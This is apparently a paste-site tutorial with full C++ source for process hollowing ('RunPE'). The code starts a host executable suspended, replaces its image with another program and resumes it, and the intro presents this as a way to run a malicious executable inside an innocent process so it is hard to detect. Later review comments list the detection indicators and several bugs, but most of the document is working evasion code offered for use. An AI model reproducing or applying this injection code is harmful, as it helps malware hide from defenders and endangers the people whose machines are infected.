
Execute An Executable Inside Another Process

a guest
Mar 30th, 2014
I guess you already know about parasites: an organism that lives on or in a host and gets its food from, or at the expense of, its host. A similar story is possible in computers as well: a malicious executable can run inside another, innocent process and thus becomes difficult to detect. Assuming that you already know about process memory, memory layout, execution, etc., we can come to the code. by Matrix n01d ~ n0 1dentity
  2.  
  3. Software Requirements
  4. Windows SDK
  5. Any C++ Compiler
  6.  
// Reads the whole file at filePath into a heap buffer allocated with
// new BYTE[] and returns it. Returns NULL only when the `if (h)` test
// fails; the caller owns the buffer (DoStuff releases it).
// The file size is taken from GetFileSize and is never validated, so a
// file shorter than a PE header still yields a buffer that the caller
// dereferences as PE structures.
LPBYTE GetFile(char *filePath)
{
LPBYTE data = NULL;
HANDLE h = CreateFileA(filePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
// NOTE(review): CreateFileA signals failure with INVALID_HANDLE_VALUE, not
// NULL, so a failed open is not caught here and GetFileSize/ReadFile run
// on an invalid handle.
if (h)
{
DWORD fSize = GetFileSize(h, NULL);
data = new BYTE[fSize];

DWORD read = NULL;
// NOTE(review): neither the ReadFile result nor `read` is checked; a short
// read leaves the tail of `data` uninitialized but still returns it.
ReadFile(h, data, fSize, &read, NULL);

CloseHandle(h);
}
return data;
}
  23.  
The above code reads any given file and returns its contents as a byte array, which is then processed and finally launched as shown below:
  25.  
// Process hollowing ("RunPE"): starts victimFile as a suspended child,
// unmaps the child's own image when it sits at the parasite's preferred
// base, copies the PE read from `file` into the child at that base,
// redirects the primary thread to the parasite's entry point and resumes it.
// The call chain visible here (CreateProcessA with CREATE_SUSPENDED ->
// NtUnmapViewOfSection -> VirtualAllocEx/WriteProcessMemory into a suspended
// child -> SetThreadContext -> ResumeThread) is the sequence behavioural
// monitoring and EDR products commonly alert on, and after ResumeThread the
// in-memory image no longer matches the host's file on disk, which
// memory-vs-disk comparison scanners flag.
// file:        path of the PE to load into the host (read fully by GetFile)
// victimFile:  command line of the host process that gets hollowed
// Returns nothing and reports no errors: the results of ReadProcessMemory,
// NtUnmapViewOfSection, WriteProcessMemory, SetThreadContext and
// ResumeThread are all ignored, and pi.hProcess / pi.hThread are never
// closed.
void DoStuff(char *file, char *victimFile)
{
LPBYTE data = GetFile(file);
if (data)
{
PIMAGE_DOS_HEADER idh = (PIMAGE_DOS_HEADER)data;
// NOTE(review): e_lfanew and the section offsets used below are taken
// from the file without any bounds check against the buffer size, so a
// truncated or malformed PE reads out of bounds here.
if (idh->e_magic == IMAGE_DOS_SIGNATURE)
{
PIMAGE_NT_HEADERS inh = (PIMAGE_NT_HEADERS)(data + idh->e_lfanew);
if (inh->Signature == IMAGE_NT_SIGNATURE)
{
PROCESS_INFORMATION pi;
STARTUPINFOA si;

ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);

// Resolved from ntdll at runtime; the pointer is not NULL-checked
// before it is called below.
pNtUnmapViewOfSection NtUnmapViewOfSection = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");

// The host is created suspended so its primary thread never executes
// the original image.
if (CreateProcessA(NULL, victimFile, NULL, NULL, false, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
{
CONTEXT c;
c.ContextFlags = CONTEXT_FULL;
if (GetThreadContext(pi.hThread, &c))
{
// The DWORD at c.Ebx + 8 is treated as the child's current image
// base (presumably a PEB field on x86 — not established here).
// Ebx/Eax are x86 CONTEXT members, so this function is 32-bit only.
DWORD imageBase = NULL;
ReadProcessMemory(pi.hProcess, (LPCVOID)(c.Ebx + 8), &imageBase, sizeof(DWORD), NULL);

// The host image is unmapped only if it already occupies the
// parasite's preferred base; otherwise it stays mapped.
if (imageBase == inh->OptionalHeader.ImageBase)
{
NtUnmapViewOfSection(pi.hProcess, (PVOID)imageBase);
}

// Requests the parasite's preferred base, SizeOfImage bytes, RWX.
// A private PAGE_EXECUTE_READWRITE region of image size in another
// process is itself a strong indicator for memory scanners.
LPVOID address = VirtualAllocEx(pi.hProcess, (LPVOID)inh->OptionalHeader.ImageBase, inh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (address)
{
// address == inh->OptionalHeader.ImageBase;
// Headers first, then each section copied from its raw file
// offset to its VirtualAddress (SizeOfRawData bytes each).
WriteProcessMemory(pi.hProcess, address, data, inh->OptionalHeader.SizeOfHeaders, NULL);
for (int i = 0; i < inh->FileHeader.NumberOfSections; i++)
{
int offset = idh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (sizeof(IMAGE_SECTION_HEADER) * i);
PIMAGE_SECTION_HEADER ish = (PIMAGE_SECTION_HEADER)(data + offset);

WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD)address + ish->VirtualAddress), data + ish->PointerToRawData, ish->SizeOfRawData, NULL);
}

// Writes the parasite's ImageBase back into the slot read above,
// points Eax at the parasite's entry point and resumes the thread.
WriteProcessMemory(pi.hProcess, (LPVOID)(c.Ebx + 8), &inh->OptionalHeader.ImageBase, sizeof(DWORD), NULL);
c.Eax = (DWORD)address + inh->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(pi.hThread, &c);

ResumeThread(pi.hThread);
}
}
}
}
}

// NOTE(review): `data` was allocated with new BYTE[] in GetFile, so this
// must be `delete[] data`; plain delete on an array is undefined behaviour.
delete data;
}
}
  87.  
  88. pNtUnmapViewOfSection is simply a typedef as shown below:
  89.  
// Function-pointer type for the ntdll export NtUnmapViewOfSection, which is
// not declared in the public Windows SDK headers and is therefore resolved
// by name with GetProcAddress in DoStuff.
typedef NTSTATUS (WINAPI* pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  91.  
  92. Now you can launch any "parasite" process into "host" process:
  93.  
// Runs C:\parasite.exe inside a suspended instance of C:\host.exe. The
// process list shows only host.exe, which is why the technique is used and
// why defenders rely on behavioural telemetry (suspended-create + remote
// write + SetThreadContext) and memory-vs-disk image comparison rather than
// on process names.
DoStuff("C:\\parasite.exe", "C:\\host.exe");